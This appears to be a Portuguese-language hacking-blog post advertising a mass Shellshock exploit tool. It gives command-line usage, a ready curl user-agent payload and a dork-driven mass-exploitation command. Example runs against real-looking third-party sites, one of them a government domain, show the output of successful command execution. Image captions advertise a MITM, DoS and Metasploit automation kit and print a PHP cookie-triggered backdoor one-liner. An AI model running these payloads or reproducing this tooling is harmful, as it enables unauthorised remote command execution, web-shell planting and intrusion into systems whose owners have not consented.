The tool inject a malicious user agent that allows exploring the vulnerabildiade sheellshock running server-side commands.
# SCRIPT by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ] # EXPLOIT NAME: Xpl SHELLSHOCK Ch3ck Tool - (MASS)/ INURL BRASIL # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Email: [email protected] # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil
- DESCRIPTION - VULNERABILITY(SHELLSHOCK)
- CVE-2014-6271, CVE-2014-6277,
- CVE-2014-6278, CVE-2014-7169,
- CVE-2014-7186, CVE-2014-7187
Shellshock aka Bashdoor, is a security hole in the Bash shell on GNU's Unix-based systems, which was released on September 24, 2014.
Many servers on the Internet such as web servers use Bash to process commands, allowing an attacker to exploit the vulnerability Bash to execute arbitrary commands. This could allow an attacker to gain unauthorized access to a computer system.
- DESCRIPTION - TOOL
The tool inject a malicious user agent that allows exploring the vulnerability
sheelshock running server-side commands.
- DEPENDENCIES:
sudo apt-get install php5 php5-cli php5-curl
- EXECUTE:
-t : SET TARGET.
-f : SET FILE TARGETS.
-c : SET COMMAND.
-w : SET UPLOAD SHELL PHP.
Execute:
php xplSHELLSHOCK.php -t target -c command
php xplSHELLSHOCK.php -f targets.txt -c command
SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w
OUTPUT VULN: SHELLSHOCK_vull.txt
- EXEMPLES:
php xpl.php -t 'http://www.xxxcamnpalxxx.com.br/cgi-bin/login.sh' -c pwd
CMD:
Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504 @ 2.00GHz GenuineIntel GNU/Linux
uid=1000(icone) gid=100(users) groups=100(users)
/ico/camnpal/cgi-bin
END_CMD:
php xpl.php -t 'http://www.xxxbnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd
CMD:
Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux
uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster)
/mnt/volume1/sitio/data/catalogos/cgi-bin
END_CMD:
OUTPUT:
- USE CURL MANUAL EXPLOIT::
curl -v --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"' 'http://www.xxxxxbnmxxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis'
OUTPUT:
- EXPLOIT MASS USE SCANNER INURLBR
./inurlbr.php --dork 'inurl:"/cgi-bin/login.sh"' -s out.txt -q 1,6 --command-vul "php xpl.php -t '_TARGETFULL_' -c pwd"
More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
- ACESSO AO EXPLOIT:
Tool Xpl SHELLSHOCK Ch3ck
https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck
REFERENCES:
http://pt.wikipedia.org/wiki/Shellshock
http://curl.haxx.se/docs/manpage.html
https://shellshocker.net/






















![netool.sh é um script em bash para automatizar frameworks como Nmap, redes de deriva, sslstrip, Metasploit e Ettercap MITM ataques. esse script faz com que seja fácil, tarefas como SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle, SSLsniff, falsificação de DNS, o outro módulos disponíveis são: recuperar metadados do site alvo, ataques DoS dentro da rede externa / local,também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode executar TCP / UDP pacotes manipulação usando etter.filters, também como a habilidade de capturar imagens de navegação na web-browser na máquina de destino sob ataque MITM e realiza uma varredura vuln ao web-site-alvo usando websecurify firefox-addon, também usos [msfpayload + + msfencode msfcli] para ter o controle remoto da máquina de destino, também veio com [root3.rb] meterpreter ruby script de auxiliar, e um módulo para instalar / editar o script meterpreter e atualizar o banco de dados Metasploit automática, busca de alvos de geolocalização, ou use [webcrawler.py] módulo para procurar páginas de login de administrador, directorys site, webshells.php plantada no site, scanner vulns upload de arquivo comum [LFI] e procurar XSS sites vuln usando idiotas google, também usa um módulo para automatizado alguns ataques mais MITM (dns-paródia + metasploit + phishing, e uma colecção de (Metasploit) exploits automatizados ... netool.sh é um script em bash para automatizar frameworks como Nmap, redes de deriva, sslstrip, Metasploit e Ettercap MITM ataques. esse script faz com que seja fácil, tarefas como SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle, SSLsniff, falsificação de DNS, o outro módulos disponíveis são: recuperar metadados do site alvo, ataques DoS dentro da rede externa / local,também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode executar TCP / UDP pacotes manipulação usando etter.filters, também como a habilidade de capturar imagens de navegação na web-browser na máquina de destino sob ataque MITM e realiza uma varredura vuln ao web-site-alvo usando websecurify firefox-addon, também usos [msfpayload + + msfencode msfcli] para ter o controle remoto da máquina de destino, também veio com [root3.rb] meterpreter ruby script de auxiliar, e um módulo para instalar / editar o script meterpreter e atualizar o banco de dados Metasploit automática, busca de alvos de geolocalização, ou use [webcrawler.py] módulo para procurar páginas de login de administrador, directorys site, webshells.php plantada no site, scanner vulns upload de arquivo comum [LFI] e procurar XSS sites vuln usando idiotas google, também usa um módulo para automatizado alguns ataques mais MITM (dns-paródia + metasploit + phishing, e uma colecção de (Metasploit) exploits automatizados ...](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8GYF6TNdYQ92yW5pLRchbUc5coDWqUTHscKpRoV3a2ttipZZ4fPZ20p8kp6XCj1L2b9_YMrD4oHSB4LSr5A_JYuAb-53lgBVwVNkXBCdoksOWS_iC_W-VXN1bgN5tBSCXfbMxoWFaTAMa/s1600/Captura+de+tela+de+2014-06-10+12:08:12.png)


![TUTORIAL / BUSCAR EMAILS [ SCANNER INURLMAIL 1.0 ] TUTORIAL / BUSCAR EMAILS [ SCANNER INURLMAIL 1.0 ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhczjmJrmV6ljhTQ-lYlhyD6NG8LfJxlfbcBcYqhIQl6UF_anMHsXYf69b7C7dvZukmTyW4apATpVd2ICe6ELgkU-sHsZueA3BxEQsLJ55bv9dsd0UIdYYFUaGtldnLIZ5DQ7CPLToAGtYu/s1600/maxresdefault.jpg)

![system(base64_decode($_COOKIE["1"])); system(base64_decode($_COOKIE["1"]));](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTBZ5fMUhrJdQhYpPODTKSqDZ3gLrKi-ti06df0Lu9aciaIrCQWKJsdPXI9c4AhYseyc0Nu5K4vjSVMW6U-ftxUD2WAowFoaPedtLHi5pTW4CpP-uABZk0QTn9VwHpEYTWOjS9RvWycOk/s1600/Sem+t%C3%ADtulo.png)

